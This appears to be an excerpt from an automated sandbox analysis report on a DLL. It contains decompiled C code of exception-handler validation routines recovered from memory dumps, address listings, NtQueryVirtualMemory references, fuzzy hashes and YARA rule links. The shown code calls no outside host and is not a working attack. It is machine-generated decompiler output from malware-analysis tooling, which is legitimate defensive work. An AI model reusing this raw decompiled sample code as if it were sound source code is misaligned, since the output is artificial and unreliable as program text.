                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b4d7
                                          0x00000000
                                          0x00c7b4cd
                                          0x00c7b450
                                          0x00c7b453
                                          0x00c7b458
                                          0x00000000
                                          0x00000000
                                          0x00c7b461
                                          0x00c7b463
                                          0x00c7b469
                                          0x00000000
                                          0x00000000
                                          0x00c7b46f
                                          0x00c7b475
                                          0x00000000
                                          0x00000000
                                          0x00c7b47b
                                          0x00c7b47d
                                          0x00c7b486
                                          0x00c7b48a
                                          0x00000000
                                          0x00000000
                                          0x00c7b490
                                          0x00c7b493
                                          0x00c7b495
                                          0x00000000
                                          0x00000000
                                          0x00c7b49c
                                          0x00c7b49e
                                          0x00000000
                                          0x00000000
                                          0x00c7b4a0
                                          0x00c7b4a4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b4a4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b38f
                                          0x00c7b38f
                                          0x00c7b38f
                                          0x00c7b396
                                          0x00000000
                                          0x00000000
                                          0x00c7b398
                                          0x00c7b399
                                          0x00c7b39b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b39b
                                          0x00c7b3c3
                                          0x00c7b3c5
                                          0x00000000
                                          0x00000000
                                          0x00c7b3d5
                                          0x00c7b3d7
                                          0x00c7b3d9
                                          0x00000000
                                          0x00000000
                                          0x00c7b3df
                                          0x00c7b3e6
                                          0x00c7b412
                                          0x00c7b412
                                          0x00c7b414
                                          0x00c7b416
                                          0x00c7b42a
                                          0x00c7b42c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b418
                                          0x00c7b418
                                          0x00c7b418
                                          0x00c7b421
                                          0x00c7b422
                                          0x00c7b424
                                          0x00c7b426
                                          0x00c7b426
                                          0x00000000
                                          0x00c7b418
                                          0x00c7b3e8
                                          0x00c7b3e8
                                          0x00c7b3eb
                                          0x00c7b3ed
                                          0x00c7b3ff
                                          0x00c7b3ff
                                          0x00c7b402
                                          0x00c7b404
                                          0x00c7b404
                                          0x00c7b405
                                          0x00c7b405
                                          0x00c7b40b
                                          0x00c7b40b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b3ef
                                          0x00c7b3ef
                                          0x00c7b3ef
                                          0x00c7b3f6
                                          0x00000000
                                          0x00000000
                                          0x00c7b3f8
                                          0x00c7b3f8
                                          0x00c7b3f9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b3f9
                                          0x00c7b3fb
                                          0x00c7b3fd
                                          0x00c7b410
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b410
                                          0x00000000
                                          0x00c7b3fd
                                          0x00c7b36f
                                          0x00c7b372
                                          0x00c7b375
                                          0x00000000
                                          0x00000000
                                          0x00c7b377
                                          0x00c7b379
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7b379
                                          0x00c7b33e
                                          0x00c7b340
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00C7B3AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: 83b4dca0e5e1cdb50b912a4e34e2d2e0ec1f1c82f65eb65b444bc7ab3230f368
                                          • Instruction ID: 21fb84f3a1ce0d09ad43bd26b9c5af734a6500ce8acdb676ee26e6c689dba6da
                                          • Opcode Fuzzy Hash: 83b4dca0e5e1cdb50b912a4e34e2d2e0ec1f1c82f65eb65b444bc7ab3230f368
                                          • Instruction Fuzzy Hash: 7061B031A006068FDB29CF29C89577973A5EF85354F64C579D82ED72A2EB30DE82C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F23F5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E005F23F5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x5f4178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x5f41c0 = 1;
										__eflags =  *0x5f41c0;
										if( *0x5f41c0 != 0) {
											goto L60;
										}
										_t84 =  *0x5f4178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x5f41c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x5f4178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x5f4180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x5f417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x5f41c0 = 1;
							__eflags =  *0x5f41c0;
							if( *0x5f41c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x5f41c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x5f4180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x5f4178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                          0x005f23ff
                                          0x005f2402
                                          0x005f2408
                                          0x005f2426
                                          0x00000000
                                          0x005f2426
                                          0x005f2410
                                          0x005f2419
                                          0x005f241f
                                          0x005f242e
                                          0x005f2431
                                          0x005f2434
                                          0x005f243e
                                          0x005f243e
                                          0x005f2440
                                          0x005f2443
                                          0x005f2445
                                          0x005f2445
                                          0x005f2447
                                          0x005f244a
                                          0x00000000
                                          0x00000000
                                          0x005f244c
                                          0x005f244e
                                          0x005f24b4
                                          0x005f24b4
                                          0x005f2612
                                          0x00000000
                                          0x005f2612
                                          0x005f2450
                                          0x005f2450
                                          0x005f2454
                                          0x005f2456
                                          0x005f2456
                                          0x005f2456
                                          0x005f2456
                                          0x005f2459
                                          0x005f245a
                                          0x005f245d
                                          0x005f245d
                                          0x005f2461
                                          0x005f2465
                                          0x005f2473
                                          0x005f2473
                                          0x005f247b
                                          0x005f2481
                                          0x005f2483
                                          0x005f2485
                                          0x005f2495
                                          0x005f24a2
                                          0x005f24a6
                                          0x005f24ab
                                          0x005f24ad
                                          0x005f252b
                                          0x005f252b
                                          0x005f24af
                                          0x005f24af
                                          0x005f24af
                                          0x005f252d
                                          0x005f252f
                                          0x005f2610
                                          0x005f2610
                                          0x00000000
                                          0x005f2535
                                          0x005f2535
                                          0x005f253c
                                          0x00000000
                                          0x00000000
                                          0x005f2542
                                          0x005f2546
                                          0x005f25a2
                                          0x005f25a4
                                          0x005f25ac
                                          0x005f25ae
                                          0x005f25b0
                                          0x00000000
                                          0x00000000
                                          0x005f25b2
                                          0x005f25b8
                                          0x005f25ba
                                          0x005f25bc
                                          0x005f25d1
                                          0x005f25d1
                                          0x005f25d3
                                          0x005f2602
                                          0x005f2609
                                          0x00000000
                                          0x005f2609
                                          0x005f25d7
                                          0x005f25d8
                                          0x005f25da
                                          0x005f25dc
                                          0x005f25dc
                                          0x005f25de
                                          0x005f25e0
                                          0x005f25e2
                                          0x005f25f6
                                          0x005f25f6
                                          0x005f25f9
                                          0x005f25fb
                                          0x005f25fb
                                          0x005f25fc
                                          0x005f25fc
                                          0x00000000
                                          0x005f25e4
                                          0x005f25e4
                                          0x005f25e4
                                          0x005f25ed
                                          0x005f25ee
                                          0x005f25f0
                                          0x005f25f2
                                          0x005f25f2
                                          0x00000000
                                          0x005f25e4
                                          0x005f25e2
                                          0x005f25be
                                          0x005f25c5
                                          0x005f25c5
                                          0x005f25c7
                                          0x00000000
                                          0x00000000
                                          0x005f25c9
                                          0x005f25ca
                                          0x005f25cd
                                          0x005f25cf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f25cf
                                          0x00000000
                                          0x005f25c5
                                          0x005f2548
                                          0x005f254b
                                          0x005f2550
                                          0x00000000
                                          0x00000000
                                          0x005f2559
                                          0x005f255b
                                          0x005f2561
                                          0x00000000
                                          0x00000000
                                          0x005f2567
                                          0x005f256d
                                          0x00000000
                                          0x00000000
                                          0x005f2573
                                          0x005f2575
                                          0x005f257e
                                          0x005f2582
                                          0x00000000
                                          0x00000000
                                          0x005f2588
                                          0x005f258b
                                          0x005f258d
                                          0x00000000
                                          0x00000000
                                          0x005f2594
                                          0x005f2596
                                          0x00000000
                                          0x00000000
                                          0x005f2598
                                          0x005f259c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f259c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2487
                                          0x005f2487
                                          0x005f2487
                                          0x005f248e
                                          0x00000000
                                          0x00000000
                                          0x005f2490
                                          0x005f2491
                                          0x005f2493
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2493
                                          0x005f24bb
                                          0x005f24bd
                                          0x00000000
                                          0x00000000
                                          0x005f24cd
                                          0x005f24cf
                                          0x005f24d1
                                          0x00000000
                                          0x00000000
                                          0x005f24d7
                                          0x005f24de
                                          0x005f250a
                                          0x005f250a
                                          0x005f250c
                                          0x005f250e
                                          0x005f2522
                                          0x005f2524
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2510
                                          0x005f2510
                                          0x005f2510
                                          0x005f2519
                                          0x005f251a
                                          0x005f251c
                                          0x005f251e
                                          0x005f251e
                                          0x00000000
                                          0x005f2510
                                          0x005f24e0
                                          0x005f24e3
                                          0x005f24e5
                                          0x005f24f7
                                          0x005f24f7
                                          0x005f24fa
                                          0x005f24fc
                                          0x005f24fc
                                          0x005f24fd
                                          0x005f24fd
                                          0x005f2503
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f24e7
                                          0x005f24e7
                                          0x005f24e7
                                          0x005f24ee
                                          0x00000000
                                          0x00000000
                                          0x005f24f0
                                          0x005f24f0
                                          0x005f24f1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f24f1
                                          0x005f24f3
                                          0x005f24f5
                                          0x005f2508
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2508
                                          0x00000000
                                          0x005f24f5
                                          0x005f2467
                                          0x005f246a
                                          0x005f246d
                                          0x00000000
                                          0x00000000
                                          0x005f246f
                                          0x005f2471
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2471
                                          0x005f2436
                                          0x005f2438
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005F24A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: a45811e2d0b1e4a7798b77c8f2adf368f895414ab0de44450c61a362952d73d3
                                          • Instruction ID: 39cc242d48aa18eb26f57b312e83399b955dc017aedfadaade99a8a7e3ff022e
                                          • Opcode Fuzzy Hash: a45811e2d0b1e4a7798b77c8f2adf368f895414ab0de44450c61a362952d73d3
                                          • Instruction Fuzzy Hash: 9D61E7B060060E9FDF29CF29D8A467A3FA5FBA4314F248429DB46CB191E77CDC81DA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C2009C, Relevance: 1.6, Strings: 1, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: t32c
                                          • API String ID: 0-3674199949
                                          • Opcode ID: 82a7aaabc82de09c9f2f8de54ffda81c0058729bef8bb6ace369724d4dbbbd1f
                                          • Instruction ID: fe5260f64aee0c194a941239e91dcb5874d142cea90843bb3a0a1cfadb70c6b1
                                          • Opcode Fuzzy Hash: 82a7aaabc82de09c9f2f8de54ffda81c0058729bef8bb6ace369724d4dbbbd1f
                                          • Instruction Fuzzy Hash: 3EE11672A00229EFDF24CB90DC80BAAB7B5FF88314F2482D6D519A7516D330AE91DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C203AC, Relevance: .1, Instructions: 103COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5448e4018b36f8f4564e0439fce57eb74105e0727b89d9800eb0fc40e93c5b8
                                          • Instruction ID: d242306aafb2de250fd74ada64401f20413bb1a9514a7ce71056194ffef531bb
                                          • Opcode Fuzzy Hash: f5448e4018b36f8f4564e0439fce57eb74105e0727b89d9800eb0fc40e93c5b8
                                          • Instruction Fuzzy Hash: 1F417372A00229DFCF20CF44D880B99B7B5FF48310F698596D95967616D330EE85CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C20476, Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c09382aa32863d1404881d5de5498841655872c6132f3eb532c889ee66d7b28a
                                          • Instruction ID: 7b19d110203614ad05d46d986ead293df295ab076141193df3502ada874058fa
                                          • Opcode Fuzzy Hash: c09382aa32863d1404881d5de5498841655872c6132f3eb532c889ee66d7b28a
                                          • Instruction Fuzzy Hash: BE415A76A00229DFDF20CF54D880BA9B7B5FF88720F298595D9496B616C330EE80CF85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7B0DC, Relevance: .1, Instructions: 77COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E00C7B0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00C7B243(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00C7B2FD(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00C7B1E8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00C7B243(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00C7B2DF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                          0x00c7b0e0
                                          0x00c7b0e1
                                          0x00c7b0e2
                                          0x00c7b0e5
                                          0x00c7b0e7
                                          0x00c7b0ea
                                          0x00c7b0eb
                                          0x00c7b0ed
                                          0x00c7b0ee
                                          0x00c7b0ef
                                          0x00c7b0f2
                                          0x00c7b0fc
                                          0x00c7b1ad
                                          0x00c7b1b4
                                          0x00c7b1bd
                                          0x00c7b102
                                          0x00c7b102
                                          0x00c7b108
                                          0x00c7b10e
                                          0x00c7b111
                                          0x00c7b114
                                          0x00c7b118
                                          0x00c7b11d
                                          0x00c7b122
                                          0x00c7b1a2
                                          0x00000000
                                          0x00c7b124
                                          0x00c7b124
                                          0x00c7b130
                                          0x00c7b132
                                          0x00c7b18d
                                          0x00c7b18d
                                          0x00c7b193
                                          0x00000000
                                          0x00c7b134
                                          0x00c7b143
                                          0x00c7b145
                                          0x00c7b146
                                          0x00c7b147
                                          0x00c7b14a
                                          0x00c7b14a
                                          0x00c7b14c
                                          0x00000000
                                          0x00c7b14e
                                          0x00c7b14e
                                          0x00c7b198
                                          0x00c7b150
                                          0x00c7b150
                                          0x00c7b154
                                          0x00c7b15c
                                          0x00c7b161
                                          0x00c7b166
                                          0x00c7b172
                                          0x00c7b17a
                                          0x00c7b181
                                          0x00c7b187
                                          0x00c7b18b
                                          0x00000000
                                          0x00c7b18b
                                          0x00c7b14e
                                          0x00c7b14c
                                          0x00000000
                                          0x00c7b132
                                          0x00c7b1a6
                                          0x00c7b1a6
                                          0x00c7b1a6
                                          0x00c7b122
                                          0x00c7b1c2
                                          0x00c7b1c9

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction ID: 982c16e673cad3ea21fd3f9928f6f948ca30bf8148c97e802009f690ee0955dc
                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction Fuzzy Hash: 1D21A7729002049FCB14DF69C895AABBBA5BF44350B45C168E9199B245D730FE15C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F21D4, Relevance: .1, Instructions: 77COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E005F21D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E005F233B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E005F23F5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E005F22E0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E005F233B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E005F23D7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                          0x005f21d8
                                          0x005f21d9
                                          0x005f21da
                                          0x005f21dd
                                          0x005f21df
                                          0x005f21e2
                                          0x005f21e3
                                          0x005f21e5
                                          0x005f21e6
                                          0x005f21e7
                                          0x005f21ea
                                          0x005f21f4
                                          0x005f22a5
                                          0x005f22ac
                                          0x005f22b5
                                          0x005f21fa
                                          0x005f21fa
                                          0x005f2200
                                          0x005f2206
                                          0x005f2209
                                          0x005f220c
                                          0x005f2210
                                          0x005f2215
                                          0x005f221a
                                          0x005f229a
                                          0x00000000
                                          0x005f221c
                                          0x005f221c
                                          0x005f2228
                                          0x005f222a
                                          0x005f2285
                                          0x005f2285
                                          0x005f228b
                                          0x00000000
                                          0x005f222c
                                          0x005f223b
                                          0x005f223d
                                          0x005f223e
                                          0x005f223f
                                          0x005f2242
                                          0x005f2242
                                          0x005f2244
                                          0x00000000
                                          0x005f2246
                                          0x005f2246
                                          0x005f2290
                                          0x005f2248
                                          0x005f2248
                                          0x005f224c
                                          0x005f2254
                                          0x005f2259
                                          0x005f225e
                                          0x005f226a
                                          0x005f2272
                                          0x005f2279
                                          0x005f227f
                                          0x005f2283
                                          0x00000000
                                          0x005f2283
                                          0x005f2246
                                          0x005f2244
                                          0x00000000
                                          0x005f222a
                                          0x005f229e
                                          0x005f229e
                                          0x005f229e
                                          0x005f221a
                                          0x005f22ba
                                          0x005f22c1

                                          Memory Dump Source
